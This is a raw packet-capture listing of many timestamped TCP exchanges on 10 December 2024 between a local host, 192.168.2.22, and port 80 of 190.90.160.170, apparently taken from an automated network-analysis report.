                          Dec 10, 2024 14:20:54.336538076 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.336631060 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.336697102 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.336888075 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.336934090 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.337119102 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.337166071 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.337774992 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.337829113 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.337918043 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.337964058 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.338068008 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.338134050 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.338606119 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.338686943 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.338774920 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.338821888 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.339226007 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.339277983 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.339562893 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.339627028 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.339981079 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.339993954 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.340080976 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.340676069 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.340728045 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.340770006 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.340822935 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.341469049 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.341536999 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.341548920 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.341600895 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.341914892 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.342262030 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.342320919 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.342772961 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.342930079 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.342978954 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.343015909 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.343059063 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.343072891 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.343118906 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.343758106 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.343816996 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.343816996 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.343873024 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.344567060 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.344618082 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.344624043 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.344664097 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.345415115 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.345474958 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.345479965 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.345530033 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.346159935 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.346172094 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.346229076 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.346892118 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.347022057 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.347207069 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.347259998 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.347670078 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.347718000 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.347745895 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.347759962 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.348429918 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.348481894 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.348769903 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.348814964 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.349309921 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.349368095 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.349385023 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.349421024 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.350016117 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.350085020 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.350114107 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.350162029 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.350800991 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.350850105 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.350888014 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.350939989 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.351592064 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.351603985 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.351716995 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.352528095 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.352540970 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.352585077 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.352585077 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.353143930 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.353154898 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.353223085 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.353928089 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.353940964 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.354038954 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.354705095 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.354717970 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.354757071 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.355536938 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.355551958 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.355604887 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.356224060 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.356241941 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.356273890 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.356295109 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.357048988 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.357062101 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.357116938 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.357116938 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.357774973 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.357826948 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.357827902 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.357887983 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.358702898 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.358768940 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.358768940 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.358899117 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.359509945 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.359524012 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.359570026 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.360166073 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.360223055 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.360248089 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.360261917 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.360989094 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.361004114 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.361054897 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.361068010 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.361735106 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.361804962 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.361846924 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.361891031 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.362504959 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.362515926 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.362565041 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.363424063 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.363436937 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.363490105 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.364046097 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.364140987 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.364178896 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.364226103 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.364882946 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.364895105 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.364926100 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.365669012 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.365680933 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.365722895 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.366637945 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.366650105 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.366708040 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.366708040 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.367170095 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.367224932 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.367233038 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.367290020 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.367882967 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.367894888 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.367938042 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.369381905 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.369395018 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.369451046 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.369451046 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.369960070 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.369971991 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.370016098 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.370016098 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.370307922 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.370321035 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.370349884 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.370367050 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.371068001 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.371078968 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.371118069 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.371706009 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.371767044 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.372009039 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.372057915 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.372564077 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.372627974 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.372651100 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.372720957 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.373434067 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.373446941 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.373482943 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.373544931 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.374039888 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.374150991 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.379409075 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.379503965 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.379559040 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.379743099 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.379755974 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.379757881 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.379792929 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.380903959 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.380914927 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.380973101 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.381264925 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.381331921 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.528007984 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.528105974 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.528285027 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.528331995 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.528352976 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.528369904 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.528369904 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.528698921 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.528762102 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.528796911 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.528847933 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.529467106 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.529572010 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.529643059 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.529685974 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.530333996 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.530345917 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.530390024 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.530998945 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.531075954 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.531230927 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.531299114 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.531872988 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.531892061 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.531924009 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.531975031 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.532562971 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.532619953 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.532789946 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.532840967 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.533494949 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.533554077 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.533560991 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.533626080 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.534574986 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.534621954 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.534642935 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.534687042 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.535155058 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.535219908 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.535222054 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.535279989 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.535689116 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.535763979 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.535798073 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.535868883 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.536767960 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.536811113 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.536900043 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.536947012 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.537484884 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.537497044 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.537540913 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.537540913 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.537986040 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.538081884 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.538280964 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.538355112 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.538808107 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.538893938 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.538938999 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.538985968 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.539554119 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.539617062 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.539760113 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.539814949 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.540323973 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.540364981 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.540373087 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.540432930 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.541146040 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.541208982 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.541224003 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.541265011 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.541974068 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.542032003 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.542035103 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.542084932 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.542985916 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.542998075 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.543040991 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.543492079 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.543541908 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.543575048 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.543623924 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.544327021 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.544377089 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.544625998 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.544691086 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.544989109 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.545063019 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.545389891 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.545468092 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.545773983 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.545787096 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.545836926 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.546554089 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.546566963 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.546627045 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.547408104 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.547463894 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.548171997 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.548183918 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.548201084 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.548232079 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.548232079 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.549087048 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.549099922 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.549150944 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.549720049 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.549732924 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.549771070 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.549771070 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.550465107 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.550477982 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.550514936 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.551254988 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.551281929 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.551321983 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.551321983 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.552090883 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.552103043 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.552146912 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.552146912 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.552799940 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.552813053 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.552850962 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.552850962 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.553554058 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.553570986 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.553616047 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.554398060 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.554413080 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.554447889 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.554464102 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.555103064 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.555114985 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.555169106 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.555854082 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.555866003 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.555911064 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.555911064 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.556696892 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.556710005 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.556755066 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.557382107 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.557431936 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.557439089 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.557482004 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.558259964 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.558271885 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.558326960 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.559067011 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.559079885 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.559119940 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.559119940 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.559782028 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.559798956 CET8049165190.90.160.170192.168.2.22
